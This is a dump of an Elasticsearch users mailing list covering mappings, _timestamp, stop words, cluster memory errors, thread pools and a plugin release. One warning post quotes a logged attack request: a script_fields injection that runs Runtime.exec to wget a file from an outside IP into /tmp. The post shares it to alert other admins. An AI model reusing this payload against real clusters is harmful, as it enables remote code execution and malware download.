>>   "format": "yyyy-MM-dd HH:mm:ss.SSS"
>> }
>> }
>> }'
>> 
>> and the next document to be indexed will have the _timestamp field added.
>> But when I search for the doc with, for example:
>> {"fields":["_timestamp"],"query":{"match_all":{}}}
>> 
>> I only get 
>> 
>> {
>> "_index": "ubilogs-mbr",
>> "_type": "logs",
>> "_id": "AUyVGpmfoHcL_d0dTPU4",
>> "_score": 1
>> }
>> 
>> no _timestamp field here.
>> Is there anything else to do?
>> 
>> Is my understanding correct: ES cluster will automatically generate a 
>> default _timestamp with the time when the doc is indexed?
>> 
>> Antoine
> 



Re: ES load test ended up with out of memory error after enabling the clustering

2015-04-16 Thread joergpra...@gmail.com
Did you assign different heap sizes? Please use the same heap size for all
data nodes. Do not limit the cache to 30%; that is very small. Let ES use
the default settings.

Jörg

On Thu, Apr 16, 2015 at 5:43 PM, Manjula Piyumal 
wrote:

> Hi all,
>
> I am trying to run load test with ES to identify system requirements and
> optimum configurations with respect to my load. I have 10 data publishing
> tasks and 100 data consuming tasks in my load test.
> Data publisher : Each publisher publishes data in every minute and it
> publishes 1700 records as a batch using java bulk API.
> Data consumer : Each consumer runs in every minute and run a query with
> randomly selected aggregation type(average, minimum or maximum) for a
> selected data for last hour.
> example query that consumer run in every minute :
>
> SearchResponse searchResponse =
> client.prepareSearch("myIndex").setTypes("myRecordType")
> .setQuery(QueryBuilders.filteredQuery(QueryBuilders.matchQuery("filed1",
> "value1"),FilterBuilders.rangeFilter("field2").from("value2").to("value3")))
>
> .addAggregation(AggregationBuilders.avg("AVG_NAME").field("field3")).execute().actionGet();
>
> I have run above test case in my local machine without ES clustering and
> it was run around 4 hours without any errors. Memory consumption of ES was
> under 2GB. After that I have run same test case in three node ES
> cluster(EC2 instances) and ES has ended up with out of memory error after
> around 5 minutes in that case. My all three instances have following same
> hardware configurations,
>
> 8GB RAM
> 80GB SSD hard disk
> 4 core CPU
>
> Instance 1
> Elasticsearch server (4GB heap)
> 10 data publishers which will publish data to the local ES server
>
> Instance 2
> Elasticsearch server (8GB heap)
> 10 consumers which will query data from the local ES server
>
> Instance 3
> Elasticsearch server (4GB heap)
>
> I'm using ES 1.5.1 version with jdk 1.8.0_40.
>
> My ES cluster have following custom configurations (all other
> configurations are default configurations)
>
> bootstrap.mlockall: true
> indices.fielddata.cache.size: "30%"
> indices.cache.filter.size: "30%"
> discovery.zen.ping.multicast.enabled: false
> discovery.zen.ping.unicast.hosts: ["host1:9300","host2:9300","host3:9300"]
>
> I believe I have missed something here regarding ES clustering
> configuration. Please help me to identify what I have missed here. I want
> to reduce the memory utilization as much as possible, that's why I have
> given only 4GB heap to ES. If there is a way to reduce the memory
> consumption by reducing read consistency level that option is also OK for
> me. I have increased the refresh interval for my index, but still no luck :(
>
> Thanks
> Manjula
>



how to change the store value of a field

2015-04-16 Thread Antoine Brun
Hello,

is there any simple way to update a mapping and change the store value of a 
field?
I'm trying to enable _timestamp:
curl -X PUT http://localhost:9200/ubilogs-mbr/_mappings/logs -d '{
"logs" : {
"_timestamp" : { 
"enabled" : true,
"store" : true,
"format": "yyyy-MM-dd HH:mm:ss.SSS"
}
}
}'

but I get

{"error":"MergeMappingException[Merge failed with failures {[mapper 
[_timestamp] has different store values]}]","status":400}


Antoine




Stop words still getting indexed after setting stop words at index level

2015-04-16 Thread bvnrwork
Hi,

I am using stop words for the first time.

I am trying to configure stop words and want to see the indexing process 
omit them.

Can you let me know why the stop words are not getting omitted during 
indexing? I still see "AND", "AN", "THE" and "The" being indexed.


Below is the index creation request:



{
  "settings": {
"index": {
  "number_of_shards": 1,
  "number_of_replicas": 0,
  "analysis": {
"analyzer": {
  "standard": {
"type": "standard"
  },
  "english": {
"stopwords": [
  "AND",
  "AN",
  "THE",
  "The",
  ""
],
"type": "english"
  },
  "cjk": {
"type": "cjk"
  },
  "french": {
"type": "french"
  },
  "german": {
"type": "german"
  },
  "italian": {
"type": "italian"
  },
  "spanish": {
"type": "spanish"
  },
  "russian": {
"type": "russian"
  },
  "arabic": {
"type": "arabic"
  }
}
  }
}
  },
  "aliases": {
"1005": {}
  }
}

And below is the index field mapping request:



{
  "document": {
"date_detection": true,
"numeric_detection": true,
"dynamic_templates": [
  {
"multi": {
  "match": "multi_*",
  "mapping": {
"type": "multi_field",
"fields": {
  "{name}": {
"index": "analyzed",
"type": "{dynamic_type}"
  },
  "{name}_raw": {
"index": "not_analyzed",
"type": "{dynamic_type}"
  }
}
  }
}
  },
  {
"number": {
  "match": "n0*",
  "mapping": {
"index": "analyzed",
"type": "{dynamic_type}"
  }
}
  }
]
  }
}



ES load test ended up with out of memory error after enabling the clustering

2015-04-16 Thread Manjula Piyumal
Hi all,

I am trying to run a load test with ES to identify system requirements and 
optimum configurations for my load. I have 10 data-publishing 
tasks and 100 data-consuming tasks in my load test. 
Data publisher: each publisher publishes data every minute, 
sending 1700 records as a batch using the Java bulk API.
Data consumer: each consumer runs every minute and executes a query with 
a randomly selected aggregation type (average, minimum or maximum) over 
selected data for the last hour.
Example query that each consumer runs every minute: 

SearchResponse searchResponse = 
client.prepareSearch("myIndex").setTypes("myRecordType")
.setQuery(QueryBuilders.filteredQuery(QueryBuilders.matchQuery("filed1", 
"value1"),FilterBuilders.rangeFilter("field2").from("value2").to("value3")))
.addAggregation(AggregationBuilders.avg("AVG_NAME").field("field3")).execute().actionGet();

I ran the above test case on my local machine without ES clustering, and it 
ran for around 4 hours without any errors. Memory consumption of ES stayed 
under 2GB. After that I ran the same test case on a three-node ES 
cluster (EC2 instances), and ES ended up with an out-of-memory error after 
around 5 minutes. All three instances have the same 
hardware configuration:

8GB RAM
80GB SSD hard disk
4 core CPU

Instance 1
Elasticsearch server (4GB heap)
10 data publishers which will publish data to the local ES server

Instance 2
Elasticsearch server (8GB heap)
10 consumers which will query data from the local ES server

Instance 3
Elasticsearch server (4GB heap)

I'm using ES 1.5.1 version with jdk 1.8.0_40.

My ES cluster has the following custom configurations (all other 
configurations are defaults):

bootstrap.mlockall: true
indices.fielddata.cache.size: "30%"
indices.cache.filter.size: "30%"
discovery.zen.ping.multicast.enabled: false
discovery.zen.ping.unicast.hosts: ["host1:9300","host2:9300","host3:9300"]

I believe I have missed something regarding the ES clustering 
configuration; please help me identify what. I want to keep memory 
utilization as low as possible, which is why I gave ES only a 4GB heap. 
If there is a way to reduce memory consumption by lowering the read 
consistency level, that option is also OK for 
me. I have increased the refresh interval for my index, but still no luck :(

Thanks
Manjula
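For readers more used to the REST API, the Java builder above corresponds roughly to this request body (1.x filtered-query syntax; field names, including the `filed1` spelling, copied verbatim from the snippet):

```python
import json

query_body = {
    "query": {
        "filtered": {
            "query": {"match": {"filed1": "value1"}},
            "filter": {"range": {"field2": {"from": "value2", "to": "value3"}}},
        }
    },
    # addAggregation(AggregationBuilders.avg("AVG_NAME").field("field3")):
    "aggs": {"AVG_NAME": {"avg": {"field": "field3"}}},
}
print(json.dumps(query_body, indent=2))
```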



Re: How many fields is too many?

2015-04-16 Thread Nikolas Everett
On Thu, Apr 16, 2015 at 10:54 AM, Mitch Kuchenberg 
wrote:

> Hey Nik, you'll have to forgive me if any of my answers don't make sense.
> I've only been familiar with Elasticsearch for about a week.
>
> 1.  Here's a template for my documents:
> https://gist.github.com/mkuchen/d71de53a80e078242af9
>
This is pretty useless to me. You'd need to show me a fully expanded
version in JSON.


> 2.  I interact with my search engine through django-haystack
> .  A query may look
> like
> `SearchQuerySet().filter(document='mitch').order_by('created_at')[:100] --
> so essentially getting the first 100 documents that have `mitch` in them,
> ordered by the field `created_at`.
>
It's always best when talking about things like this to do it with curl
posting JSON, because curl is our common language.

>
> 3.  Each node has 247.5MB of heap allocated judging by my hosting
> service's dashboard.
>
Sorry, what is the value of the -Xmx parameter you used to run Elasticsearch?
The actual amount of heap in use at a time isn't usually useful.


> 4.  The documents/fields take up roughly 30MB on disk.
>
Searches over that much data should be instant.


> 5.  Using Elasticsearch version 1.4.2 but could very easily upgrade.
>
It's cool.


> 6.  I'm hosting with found.no so I don't have access to a command line to
> run that unfortunately.
> 7.  I haven't found any options in found.no to disable swapping, so I
> would assume they have it off by default?  I could be wrong though.
>

I think you should take this up with found.no. Maybe try running
Elasticsearch locally and comparing. In general, 30MB of index should be
instantly searchable unless Elasticsearch is swapped out, or the Linux disk
cache is cold and the I/O subsystem is amazingly bad. Or something else
weird like that.

One last question that I forgot to ask: what is your mapping?

Nik



Re: timestamp

2015-04-16 Thread Antoine Brun
Hello,

based on the comments I could create a new index with _timestamp activated 
and it works great.
Now my problem arises when I want to activate the timestamp on an 
existing index.
Since _timestamp is not stored by default, I wanted to set "store" to true, 
but I get 

{
"error": "MergeMappingException[Merge failed with failures {[mapper 
[_timestamp] has different store values]}]",
"status": 400
}

Is there any way to achieve this?

Antoine


Le mardi 7 avril 2015 18:20:33 UTC+2, Antoine Brun a écrit :
>
> Hello,
>
> I'm trying to use the timestamp feature to automatically add a timestamp 
> to the newly indexed doc.
> Since we are already indexing documents without timestamps, I figured out 
> that I could simply execute:
>
> curl -XPUT 'http://localhost:9200/ubilogs-mbr/_mapping/logs' -d '{
> "logs" : {
> "_timestamp" : { 
>  "enabled" : true,
>   "stored" : true,
>   "format": "yyyy-MM-dd HH:mm:ss.SSS"
> }
> }
> }'
>
> and the next document to be indexed will have the _timestamp field added.
> But when I search for the doc with, for example:
> {"fields":["_timestamp"],"query":{"match_all":{}}}
>
> I only get 
>
> {
>   "_index": "ubilogs-mbr",
>   "_type": "logs",
>   "_id": "AUyVGpmfoHcL_d0dTPU4",
>   "_score": 1
> }
>
> no _timestamp field here.
> Is there anything else to do?
>
> Is my understanding correct: ES cluster will automatically generate a 
> default _timestamp with the time when the doc is indexed?
>
> Antoine
>



1.5.1 upgrade failure

2015-04-16 Thread Ted Smith
Hi, 

I just upgraded from 1.5.0 to 1.5.1.
I got a bunch of errors; the following, I think, shows the issue:

[nested: ElasticsearchException[failed to read [dd][1428754566313]]; 
nested: ElasticsearchIllegalArgumentException[No version type match [99]]; 
]]


Any idea how to fix it? Somehow I can still query it.

Thanks



[ANN] Elasticsearch Azure cloud plugin 2.6.0 released

2015-04-16 Thread Elasticsearch Team
Heya,


We are pleased to announce the release of the Elasticsearch Azure cloud plugin, 
version 2.6.0.

The Azure Cloud plugin allows you to use the Azure API for the unicast 
discovery mechanism and to add Azure storage repositories.

https://github.com/elastic/elasticsearch-cloud-azure/

Release Notes - elasticsearch-cloud-azure - Version 2.6.0


Fix:
 * [56] - [package] stax-api is added twice 
(https://github.com/elastic/elasticsearch-cloud-azure/issues/56)
 * [55] - Failure when creating a container should raise an exception 
(https://github.com/elastic/elasticsearch-cloud-azure/pull/55)

Update:
 * [77] - Update to elasticsearch 1.5.0 
(https://github.com/elastic/elasticsearch-cloud-azure/issues/77)
 * [65] - Simplify  setting index.store.type with smb_simple_fs and smb_mmap_fs 
(https://github.com/elastic/elasticsearch-cloud-azure/pull/65)
 * [63] - Use Azure Java Management SDK 0.7.0 
(https://github.com/elastic/elasticsearch-cloud-azure/pull/63)
 * [62] - Rename settings for discovery and repositories 
(https://github.com/elastic/elasticsearch-cloud-azure/pull/62)
 * [61] - Rename settings for repositories 
(https://github.com/elastic/elasticsearch-cloud-azure/pull/61)
 * [57] - Use Azure Storage 2.0.0 
(https://github.com/elastic/elasticsearch-cloud-azure/pull/57)

New:
 * [64] - Add keystore.type, deployment.name and deployment.slot settings for 
discovery (https://github.com/elastic/elasticsearch-cloud-azure/pull/64)
 * [60] - Open Lucene MMap/SimpleFSDirectory with Read option 
(https://github.com/elastic/elasticsearch-cloud-azure/pull/60)



For questions or comments around this plugin, feel free to use elasticsearch 
mailing list: https://groups.google.com/forum/#!forum/elasticsearch

Enjoy,

-The Elasticsearch team



Index boost

2015-04-16 Thread David Sinclair
Hi,

We have an index per category of item we are indexing, and our search 
searches across all of the indexes. I would like to boost results from 
some indexes. Reading the docs, this seems to be what I want:

http://www.elastic.co/guide/en/elasticsearch/reference/1.x/search-request-index-boost.html

However I cannot see how to do this with the java api.  Is it possible to 
add index boost when using the QueryBuilder?  
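
For context, the linked docs describe a request-body form along these lines (a sketch; the index names are made up for illustration):

```json
{
  "indices_boost": {
    "category_a": 1.5,
    "category_b": 1.2
  },
  "query": { "match_all": {} }
}
```

Whether the 1.x Java client exposes this on the QueryBuilder is exactly the open question here; it appears to live on SearchRequestBuilder (an `addIndexBoost(index, boost)` method) rather than on the query itself, but that is worth verifying against the client Javadoc.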

Thanks in advance,

David



Saturating the management thread pool

2015-04-16 Thread Charlie Moad
A few days ago we started to receive a lot of timeouts across our cluster. 
This is causing shard allocation to fail and a perpetual red/yellow state.

Examples:
[2015-04-16 15:04:50,970][DEBUG][action.admin.cluster.node.stats] 
[coordinator02] failed to execute on node [1rfWT-mXTZmF_NzR_h1IZw]
org.elasticsearch.transport.ReceiveTimeoutTransportException: 
[search01][inet[ip-172-30-11-161.ec2.internal/172.30.11.161:9300]][cluster:monitor/nodes/stats[n]]
 
request_id [3680727] timed out after [15001ms]
at 
org.elasticsearch.transport.TransportService$TimeoutHandler.run(TransportService.java:529)
at 
java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at 
java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)

[2015-04-16 15:03:26,105][WARN ][gateway.local] [coordinator02] 
[global.y2014m01d30.v2][0]: failed to list shard stores on node 
[1rfWT-mXTZmF_NzR_h1IZw]
org.elasticsearch.action.FailedNodeException: Failed node 
[1rfWT-mXTZmF_NzR_h1IZw]
at 
org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction.onFailure(TransportNodesOperationAction.java:206)
at 
org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction.access$1000(TransportNodesOperationAction.java:97)

at 
org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction$4.handleException(TransportNodesOperationAction.java:178)
at 
org.elasticsearch.transport.TransportService$TimeoutHandler.run(TransportService.java:529)
at 
java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at 
java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
Caused by: org.elasticsearch.transport.ReceiveTimeoutTransportException: 
[search01][inet[ip-172-30-11-161.ec2.internal/172.30.11.161:9300]][internal:cluster/nodes/indices/shard/store[n]]
 
request_id [3677537] timed out after [30001ms]
... 4 more

I believe I have tracked this down to the management thread pool being 
saturated on our data nodes and not responding to requests. Our cluster has 
3 master nodes (no data) and 3 worker nodes (no master). I increased the 
maximum pool size from 5 to 20, and the workers immediately jumped to 20 
active threads. I'm still seeing the errors.
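
For reference, a pool-size change like the one described above would typically go in elasticsearch.yml; this is a sketch assuming the ES 1.x `threadpool.management.*` setting names (verify against the thread pool docs for your version):

```yaml
# elasticsearch.yml -- sketch; assumes ES 1.x "threadpool.management.*" names
threadpool.management.type: scaling
threadpool.management.size: 20        # raised from the default of 5
threadpool.management.keep_alive: 5m
```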

host            management.type management.active management.size management.queue management.queueSize management.rejected management.largest management.completed management.min management.max management.keepAlive
coordinator01   scaling 1    200     237884   1 20 5m
search02        scaling 1    2000 20 1945337  1 20 5m
search01        scaling 1    2000 20 2034838  1 20 5m
search03        scaling 1    2000 20 1862848  1 20 5m
coordinator03   scaling 1    200     237875   1 20 5m
coordinator02   scaling 2    500     544127   1 20 5m

How can I address this problem?

Thanks,
 Charlie



Warning: Exploit attempts against ES..

2015-04-16 Thread Eike Dehling
In case your elasticsearch cluster is internet-accessible: be aware that
folks on the internet are probably trying to exploit it...

Found this in our logging today (fortunately this is only our staging
environment):


Caused by: org.elasticsearch.search.SearchParseException:
[logstash-2015.04.15][0]: query[ConstantScore(*:*)],from[-1],size[-1]:
Parse Failure [Failed to parse source [{"query": {"filtered": {"query":
{"match_all": {, "script_fields": {"exp": {"script": "import
java.util.*;import java.io.*;String str = \"\";BufferedReader br = new
BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O
/tmp/ruvn http://122.224.48.28:8000/ruvn\";).getInputStream()));StringBuilder
sb = new
StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}},
"size": 1}]]

-- 
Met vriendelijke groet,
Kind regards,

Eike Dehling
Lead Developer

Buzzcapture
Herengracht 180, 1016 BR, Amsterdam

T: +31 (0)20 3200377
M: +31 (0)6 45144840

LinkedIn | @buzzcapture




Re: How many fields is too many?

2015-04-16 Thread Mitch Kuchenberg
Hey Nik, you'll have to forgive me if any of my answers don't make sense. 
 I've only been familiar with Elasticsearch for about a week.

1.  Here's a template for my documents: 
 https://gist.github.com/mkuchen/d71de53a80e078242af9
2.  I interact with my search engine through django-haystack.  A query may 
look like 
`SearchQuerySet().filter(document='mitch').order_by('created_at')[:100]` -- 
so essentially getting the first 100 documents that have `mitch` in them, 
ordered by the field `created_at`.
3.  Each node has 247.5MB of heap allocated judging by my hosting service's 
dashboard.
4.  The documents/fields take up roughly 30MB on disk.
5.  Using Elasticsearch version 1.4.2 but could very easily upgrade.
6.  I'm hosting with found.no so I don't have access to a command line to 
run that unfortunately.
7.  I haven't found any options in found.no to disable swapping, so I would 
assume they have it off by default?  I could be wrong though.

Thanks for your reply.


On Thursday, April 16, 2015 at 10:06:39 AM UTC-4, Nikolas Everett wrote:
>
>
>
> On Thu, Apr 16, 2015 at 9:40 AM, Mitch Kuchenberg  > wrote:
>
>> I'm currently working on implementing ElasticSearch on a Django-based 
>> REST API.  I hope to be able to search through roughly 5 million documents, 
>> but I've struggled to find an answer to a question I've had from the 
>> beginning:  *how many fields is too many for a single indexed object?*
>>
>> My setup has 512MB of storage and 4GB of memory, 1 shard, and 2 nodes.
>>
>> I want to be able to sort/filter on about 30 different fields for that 
>> single model, but only search on 5-6.  Is 30 fields too many?
>>
>>
> We run with about 20 fields and have no trouble:
> https://en.wikipedia.org/wiki/Field_%28mathematics%29?action=cirrusDump
>
> We have lots more data and lots more machine than you do but I don't see 
> why it wouldn't scale down.
>  
>
>> I have a dev environment set up with roughly 30,000 documents and the 
>> same number of fields, and updates and queries are taking significantly 
>> longer than I had hoped.  Updating a single document is taking between 4-5 
>> seconds, and searching for a 5-character long string is taking 3-4 seconds.
>>
>
>
>  Something is up, yeah. Its hard to figure out what might be up from 
> reading this though. Some questions that are normal to ask here:
> 1. Can you post an example document (like as a gist or pastebin or 
> whatever)?
> 2. Can you post an example query?
> 3. How much heap are you giving Elasticsearch?
> 4. How much disk is the 30,000 documents taking up 
> (/var/lib/elasticsearch) ?
> 5. What version are you using?
> 6. Do you see IO during the query (iostat -dmx 3 10) ?
> 7. Swapping?
>
> Nik
>



Re: How many fields is too many?

2015-04-16 Thread Nikolas Everett
On Thu, Apr 16, 2015 at 10:21 AM, joergpra...@gmail.com <
joergpra...@gmail.com> wrote:

> The time required for update depends on the peculiarities of the update
> operations, the massive scripting overhead, the refresh operation, and the
> segment merge activities that are related.
>
> The number of fields does not matter.
>
> My application has 5000 fields. I avoid updates at all costs. A new
> document is faster.
>
>
We can't do that in our application and so have to eat the load for
updates. As far as I can see the biggest cost is in segment merge and the
overhead of tombstoned entries before they are merged out. Still, with
30,000 documents none of that is likely to be a big deal.



Re: How many fields is too many?

2015-04-16 Thread joergpra...@gmail.com
The time required for update depends on the peculiarities of the update
operations, the massive scripting overhead, the refresh operation, and the
segment merge activities that are related.

The number of fields does not matter.

My application has 5000 fields. I avoid updates at all costs. A new
document is faster.

Jörg

On Thu, Apr 16, 2015 at 3:40 PM, Mitch Kuchenberg 
wrote:

> I'm currently working on implementing ElasticSearch on a Django-based REST
> API.  I hope to be able to search through roughly 5 million documents, but
> I've struggled to find an answer to a question I've had from the beginning:
>  *how many fields is too many for a single indexed object?*
>
> My setup has 512MB of storage and 4GB of memory, 1 shard, and 2 nodes.
>
> I want to be able to sort/filter on about 30 different fields for that
> single model, but only search on 5-6.  Is 30 fields too many?
>
> I have a dev environment set up with roughly 30,000 documents and the same
> number of fields, and updates and queries are taking significantly longer
> than I had hoped.  Updating a single document is taking between 4-5
> seconds, and searching for a 5-character long string is taking 3-4 seconds.
>
> Is there hope that this is a configuration problem, or should I reconsider
> how many fields I'm using?  Thanks in advance.
>



Re: How to achieve ELK High availability

2015-04-16 Thread Magnus Bäck
On Thursday, April 16, 2015 at 13:35 CEST,
 vikas gopal  wrote:

> Thank you for the suggestion, yes I am aware and I am done with ES
> clustering. Now I want the same for LS. Since LS does not have a built-in
> clustering feature like ES does, what would be the best way to make LS
> highly available in a Windows environment?

Let's continue that discussion in the logstash-users thread.

https://groups.google.com/d/topic/logstash-users/tQHqrXPSV_w/discussion

-- 
Magnus Bäck| Software Engineer, Development Tools
magnus.b...@sonymobile.com | Sony Mobile Communications



Re: How many fields is too many?

2015-04-16 Thread Nikolas Everett
On Thu, Apr 16, 2015 at 9:40 AM, Mitch Kuchenberg 
wrote:

> I'm currently working on implementing ElasticSearch on a Django-based REST
> API.  I hope to be able to search through roughly 5 million documents, but
> I've struggled to find an answer to a question I've had from the beginning:
>  *how many fields is too many for a single indexed object?*
>
> My setup has 512MB of storage and 4GB of memory, 1 shard, and 2 nodes.
>
> I want to be able to sort/filter on about 30 different fields for that
> single model, but only search on 5-6.  Is 30 fields too many?
>
>
We run with about 20 fields and have no trouble:
https://en.wikipedia.org/wiki/Field_%28mathematics%29?action=cirrusDump

We have lots more data and lots more machine than you do but I don't see
why it wouldn't scale down.


> I have a dev environment set up with roughly 30,000 documents and the same
> number of fields, and updates and queries are taking significantly longer
> than I had hoped.  Updating a single document is taking between 4-5
> seconds, and searching for a 5-character long string is taking 3-4 seconds.
>


 Something is up, yeah. It's hard to figure out what exactly from
reading this alone, though. Some questions that are normal to ask here:
1. Can you post an example document (like as a gist or pastebin or
whatever)?
2. Can you post an example query?
3. How much heap are you giving Elasticsearch?
4. How much disk is the 30,000 documents taking up (/var/lib/elasticsearch)
?
5. What version are you using?
6. Do you see IO during the query (iostat -dmx 3 10) ?
7. Swapping?

Nik



Re: Changing the published port

2015-04-16 Thread Vinicius Carvalho
Doh! Thanks a lot for this :)

On Monday, April 13, 2015 at 7:52:11 PM UTC-4, Jay Modi wrote:
>
> Have you tried transport.publish_port [1]? 
>
> [1]
> http://www.elastic.co/guide/en/elasticsearch/reference/1.5/modules-transport.html#_tcp_transport
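
For readers finding this thread later: the setting referenced above goes in elasticsearch.yml; the port value below is purely illustrative:

```yaml
# elasticsearch.yml -- publish a different port than the bound one (example value)
transport.publish_port: 9301
```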



How many fields is too many?

2015-04-16 Thread Mitch Kuchenberg
I'm currently working on implementing ElasticSearch on a Django-based REST 
API.  I hope to be able to search through roughly 5 million documents, but 
I've struggled to find an answer to a question I've had from the beginning: 
 *how many fields is too many for a single indexed object?*

My setup has 512MB of storage and 4GB of memory, 1 shard, and 2 nodes.

I want to be able to sort/filter on about 30 different fields for that 
single model, but only search on 5-6.  Is 30 fields too many?

I have a dev environment set up with roughly 30,000 documents and the same 
number of fields, and updates and queries are taking significantly longer 
than I had hoped.  Updating a single document is taking between 4-5 
seconds, and searching for a 5-character long string is taking 3-4 seconds.

Is there hope that this is a configuration problem, or should I reconsider 
how many fields I'm using?  Thanks in advance.



elasticsearch start issue

2015-04-16 Thread Sigehere
Hi Friends,
I was using Elasticsearch 0.90.8. Now I have downloaded 
elasticsearch-1.5.1.deb, but when I try to start Elasticsearch I get the 
following error:
$ sudo service elasticsearch start
 * Starting Elasticsearch Server
   ...fail!
   ...fail!
   ...fail!
   ...fail!
   ...fail!
   ...fail!

I didn't get any log information in /var/log/elasticsearch.
Can anybody tell me where I went wrong?



Access to specific kibana dashboards

2015-04-16 Thread Rubaiyat Islam Sadat
Hi all,

As a complete newbie here, I am going to ask you a question which you 
might find naive (or stupid!). I have a scenario where I would like to 
restrict access from specific locations (say, IP addresses) to 
*'specific'* dashboards in Kibana. As far as I know, Apache-level 
access control is based on relative static paths/URLs; it won't know in 
detail how Kibana works. Is there any way/suggestion to control which users 
can load which dashboards? Or maybe I'm wrong and there is a way to do 
that. Your suggestions would be really helpful. I am using Kibana 3 and I 
am not in a position to use Shield.

Cheers!
Ruby



Re: How to achieve ELK High availability

2015-04-16 Thread vikas gopal
Thank you for the suggestion, yes I am aware and I am done with ES 
clustering. Now I want the same for LS. Since LS does not have a built-in 
clustering feature like ES does, what would be the best way to make LS 
highly available in a Windows environment? 

On Wednesday, April 1, 2015 at 12:03:24 PM UTC+5:30, Magnus Bäck wrote:
>
> On Wednesday, April 01, 2015 at 05:06 CEST, 
>  vikas gopal > wrote: 
>
> > Need your valuable suggestions here . I have ELK on a single windows 
> > instance and I want to make it high available . I mean if one machine 
> > goes down second will take up the whole load, like clustering. Can you 
> > suggest how I can achieve this. 
>
> Since you're saying "like clustering", are you aware that Elasticsearch 
> supports clustering natively? To improve the availability, run two or 
> (preferably) at least three Elasticsearch nodes and configure replicas 
> for your shards. If one node goes down all data will still be available. 
>
>
> http://www.elastic.co/guide/en/elasticsearch/guide/current/distributed-cluster.html
>  
>
> -- 
> Magnus Bäck| Software Engineer, Development Tools 
> magnu...@sonymobile.com  | Sony Mobile Communications 
>



How to configure max file descriptors on windows OS?

2015-04-16 Thread Xudong You
Does anyone know how to change the max_file_descriptors setting on Windows?
I built an ES cluster on Windows and got the following process information:

"max_file_descriptors" : -1,
"open_file_descriptors" : -1,

What does "-1" mean?
Is it possible to change the max file descriptors on the Windows platform?



Re: Please suggest.

2015-04-16 Thread info


On Wednesday, April 15, 2015 at 8:00:12 AM UTC+2, vikas gopal wrote:
>
> Thank you for your quick response. I am totally new to this; is there any 
> document or website to understand nginx, or any guide to configuring 
> nginx as a reverse proxy on Windows Server 2012?
>
>
>
Have a look here http://nginx-win.ecsds.eu/ , plenty of docs and examples, 
all Windows orientated.
 



Re: Assistance with Choosing the Correct Query Structure

2015-04-16 Thread David Dyball
Sorry, I missed out "boost_mode": "replace" in my function_score example 
above. I want the score to be the exact converted price, so I can make use 
of it in code.

On Thursday, April 16, 2015 at 10:44:35 AM UTC+1, David Dyball wrote:
>
> Hi All,
>
> TL;DR: Doing dynamic currency conversion via function_score works great 
> for scenarios where I want to sort by prices,
> but I want the same functionality in queries that will be sorted by 
> relevance score when using terms while still retaining
> a dynamically calculated field for the converted price.
>
> Long version:
>
> I'm looking to deploy Elasticsearch as a primary search engine for a 
> catalog of products. Each product has a 
> provider_price and provider_currency field. The "provider_price" is 
> always in the currency specified by 
> "provider_currency". When a user gets their search results they want to 
> display it in their local currency. To 
> do this I've come up with two different queries depending on how the 
> results will be sorted for the end user.
>
> 1) If the user requests a price-based sorting (asc/desc) then I'm using a 
> function_score query like so:
>
> {
>   "query": {
>     "function_score": {
>       "functions": [
>         {
>           "script_score": {
>             "script": "( rates[_source.provider_currency] * _source.provider_price )",
>             "params": {
>               "rates": {
>                 "USD": 1,
>                 "AUD": 0.75,
>                 ...
>               }
>             }
>           }
>         }
>       ],
>       "query": {
>         "filtered": {
>           
>         }
>       }
>     }
>   },
>   "sort": [
>     { "_score": "asc/desc" }
>   ]
> }
>
> 2) When sorting by terms or other fields in the document I still need to 
> calculate the converted price, so I'm using script_fields like so:
>
> {
>   "fields": [
> "_source"
>   ],
>   "query": {
> ..
>   },
>   "script_fields": {
> "user_price": {
>   "script": "( rates[_source.provider_currency] * 
> _source.provider_price )",
>   "params": {
> "rates": {
>   "USD": 1,
>   "AUD": 0.75,
>   ...
>   ...
>   ...
> }
>   }
> }
>   },
>   "sort": [
> {
>   "_score": "desc"
> }
>   ]
> }
>
>
> A few queries with the above:
>
>   1) Does this generally seem like a sane implementation?
>
>   2) These both work perfectly for doing on-the-fly conversions of 
> currency and returning it with the documents, but at the moment my 
> app-side code has to make the distinction between price-sorting queries 
> and term queries and issue the correct one, as well as extract the 
> converted price from the correct field depending on the query (_score or 
> _source.user_price respectively).
>
>   Is there any way to simplify this?
>
>   e.g. When doing a function_score query, copy the _score to another 
> generated field called "user_score". 
>   That way the code only needs to know about one field ("user_score") 
> for both queries.
>
> Cheers for any assistance the community can provide.
>
> David.
>



Assistance with Choosing the Correct Query Structure

2015-04-16 Thread David Dyball
Hi All,

TL;DR: Doing dynamic currency conversion via function_score works great for 
scenarios where I want to sort by prices, but I want the same functionality 
in queries that will be sorted by relevance score when using terms, while 
still retaining a dynamically calculated field for the converted price.

Long version:

I'm looking to deploy Elasticsearch as a primary search engine for a 
catalog of products. Each product has a 
provider_price and provider_currency field. The "provider_price" is always 
in the currency specified by 
"provider_currency". When a user gets their search results they want to 
display it in their local currency. To 
do this I've come up with two different queries depending on how the 
results will be sorted for the end user.
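
As a side note for readers, the conversion both scripts perform is just a rate lookup multiplied by the price; in plain Python terms (illustrative rates only, mirroring the example params in the queries):

```python
def convert(provider_price, provider_currency, rates):
    """Mirror of the ES script: rates[provider_currency] * provider_price."""
    return rates[provider_currency] * provider_price

# Illustrative rates matching the example params used in the queries.
rates = {"USD": 1, "AUD": 0.75}
print(convert(100, "AUD", rates))  # prints 75.0
```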

1) If the user requests a price-based sorting (asc/desc) then I'm using a 
function_score query like so:

{
  "query": {
    "function_score": {
      "functions": [
        {
          "script_score": {
            "script": "( rates[_source.provider_currency] * _source.provider_price )",
            "params": {
              "rates": {
                "USD": 1,
                "AUD": 0.75,
                ...
              }
            }
          }
        }
      ],
      "query": {
        "filtered": {
          
        }
      }
    }
  },
  "sort": [
    { "_score": "asc/desc" }
  ]
}

2) When sorting by terms or other fields in the document I still need to 
calculate the converted price, so I'm using script_fields like so:

{
  "fields": [
"_source"
  ],
  "query": {
..
  },
  "script_fields": {
"user_price": {
  "script": "( rates[_source.provider_currency] * 
